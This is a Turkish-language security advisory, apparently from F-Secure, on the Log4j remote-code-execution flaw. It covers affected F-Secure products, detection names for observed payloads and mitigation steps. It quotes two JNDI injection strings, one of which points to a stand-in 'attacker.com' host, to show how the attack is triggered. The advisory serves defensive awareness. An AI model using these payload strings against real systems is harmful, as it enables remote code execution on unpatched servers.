Log4J kütüphanesinde 10 Aralık Cuma günü keşfedilen bir güvenlik açığı, dünya çapında yazılım üreticilerini ve hizmet sağlayıcıları sallıyor. Microsoft'un Minecraft'ından e-ticaret platformlarına yazılımdaki günlük mesajlarını işlemeye yönelik standartlaştırılmış yöntemdeki güvenlik açığı, saldırganlar tarafından şimdiden saldırıya uğruyor.
Şu anda savunmasız uygulamaların oluşturduğu risk düzeyini açıklamak neredeyse imkansızdır. Güvenlik açığını hedef alan kullanıcı kontrollü bir karakter dizisi günlüğe kaydedilirse güvenlik açığı uzaktan çalıştırılabilir. Basitçe ifade etmek gerekirse, bir saldırgan bu güvenlik açığını kullanarak hedef sistemi kandırarak uzak bir konumdan kod alıp çalıştırabilir. İkinci adımda, kötü amaçlı kodun ne yapması gerektiği saldırgana bağlıdır.
"Neredeyse mükemmel bir fırtına"
Bu güvenlik açığı, kurumsal yazılımları birden çok düzeyde korumanın ne kadar zor olduğunu gösteriyor. Java'nın eski sürümleri de dahil olmak üzere eski yazılımlar, birçok şirketi kendi yamalarını geliştirmeye veya hemen yama yapmalarını engellemeye zorlar. Başka bir karmaşıklık, Log4j'nin günlük tutma yeteneklerine gerçek zamanlı olarak yama yapma zorluğundan kaynaklanır, tam da saldırı tehdidi çok yüksek ve günlük kaydı çok önemliyken.
Cybersecurity & Infrastructure Security Agency bir blog gönderisinde, önerilen tüm karşı önlemlerin "hemen" uygulanması gerektiğini yazıyor.
Bireysel kullanıcıların, çeşitli çevrimiçi hizmetler kullanıma sunuldukça güncellemelerini yüklemekten başka yapabilecekleri pek bir şey yoktur. Ve bu hemen olmalı. Firmalar ve kuruluşlar, kendi sistemlerini güvence altına alırken yamaları dağıtmak için durmaksızın çalışacak. Bundan sonra, etkilenen sistemlerde aktif bir güvenlik olayının devam edip etmediğini belirlemek önemli olacaktır.
Güvenlik açıkları neredeyse her yerde
Log4J Kitaplığını kullanmayan bir uygulama bulmak, kullanandan daha zor olabilir. Bu her yerde bulunma, saldırganların neredeyse her yerde güvenlik açıklarını arayabileceği anlamına gelir.
"Lütfen Tesla veya iPhone'unuzun adını değiştirin. NOT Beklenmedik bir olay istemiyorsanız ${jndi:ldap://url/a} adresini ziyaret edin," diyor F-Secure Bilgi Güvenliği Başkanı Erka Koivunen, şaka yollu.
Log4J'nin biçimlendirme dilinin kullanılması, savunmasız uygulamalarda kötü amaçlı yazılımları tetikleyebilir. Bildiğimiz gibi, örneğin bir Minecraft sohbetinde ${jndi:ldap://attacker.com/pwnyourserver} gibi bir ifadeden bahsetmek, yama uygulanmamış bir sistemde Microsoft'ta bir güvenlik fırtınasını tetikleyebilir.
F-Secure ürünleri etkilenir mi?
F-Secure, aşağıdaki ürünlerin bu güvenlik açığından etkilendiğini belirlemiştir:
- F-Secure Politika Yöneticisi
- F-Secure İlke Yöneticisi Proxy'si
- F-Secure Uç Nokta Proxy'si
- F-Secure Elements Konnektörü
Bu ürünlerin hem Windows hem de Linux sürümleri etkilenir ve derhal yama yapılmalıdır.
F-Secure ürünüme nasıl yama yapabilirim?
Bu güvenlik açığı için bir güvenlik yaması geliştirdik. Bu güvenlik açığıyla ilgili haberler ve güncellemeler topluluk sayfamızda sürekli olarak yayınlanmaktadır.
F-Secure bu güvenlik açığına karşı nasıl bir koruma sunuyor?
F-Secure Endpoint Protection (EPP), en son yerel yararlanma dosyalarına yönelik algılamalarla sürekli olarak güncellenir, ancak bir güvenlik açığından yararlanmanın birçok yolu göz önüne alındığında, bu, sorunun yalnızca bir kısmını kapsar.
EPP algılamaları, her zamanki gibi, kullanım sonrası aşamada görülen herhangi bir yük ile ilgilenir. Bu yazı itibariyle F-Secure, bazı ciddi saldırı senaryolarını kapsayan aşağıdaki tespitleri yapmıştır. Bunlar, Log4j açıklarından yararlanma ile bağlantılı olarak gözlemlediğimiz kötü amaçlı yüklerdir.
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShel.Agent.SWR
- TR/Coblat.G1
- TR/AD.MeterpreterSC.rywng
Bu tespitlerin birçoğu F-Secure EPP'de aylardır mevcuttur, bu da müşterilerin bu yüklerden proaktif olarak korunduğu anlamına gelir.
İstismardan yararlanmanın birden fazla yolu olduğundan, mevcut diğer tespitler de yardımcı olabilir. Yararlı tespitlerin bu listesi, durum geliştikçe sürekli olarak güncellenecektir. Ek düzeltici eylemler için aşağıdaki bölümdeki genel önerilere bakın.
Genel olarak, üreticisinden bağımsız olarak herhangi bir yazılımla ilgili ne gibi önlemler almalısınız?
- Ağ erişimini kısıtlayın veya güvenilir sitelerle sınırlayın. Sisteminiz kötü amaçlı kodu almak için internete bağlanamıyorsa saldırı başarısız olur.
- Güvenlik açıklarına yönelik yamalar ve diğer düzeltmeler hakkında bilgi için satıcılarla düzenli olarak görüşün.
- F-Secure Elements Güvenlik Açığı Yönetimi, güvenlik açığı bulunan sistemleri belirlemeye yardımcı olabilir.
- F-Secure Elements Uç Nokta Koruması veya F-Secure Business Suite ürünleri, yüklendikleri sistemdeki savunmasız yazılımları algılayabilir ve yamalayabilir.
F-Secure ayrıca tüm müşterileri ve kullanıcıları her zaman güncel tutar.
Daha fazlası F-Secure.com'da
F-Secure Hakkında Hiç kimse gerçek siber saldırıları F-Secure'dan daha iyi kavrayamaz. Tespit ve yanıt arasındaki boşluğu kapatıyoruz. Bunu yapmak için, sektörümüzün en iyi yüzlerce teknik danışmanının eşsiz tehdit uzmanlığından, ödüllü yazılımımızı çalıştıran milyonlarca cihazdan gelen verilerden ve yapay zekada süregelen yeniliklerden yararlanıyoruz. Önde gelen bankalar, havayolları ve şirketler, dünyanın en tehlikeli siber tehditleriyle savaşma taahhüdümüze güveniyor. En iyi kanal iş ortaklarımızdan ve 200'den fazla hizmet sağlayıcıdan oluşan ağımızla birlikte misyonumuz, tüm müşterilerimize ihtiyaçlarına göre uyarlanmış kurumsal düzeyde siber güvenlik sağlamaktır. 1988 yılında kurulan F-Secure, NASDAQ OMX Helsinki Ltd.'de işlem görmektedir.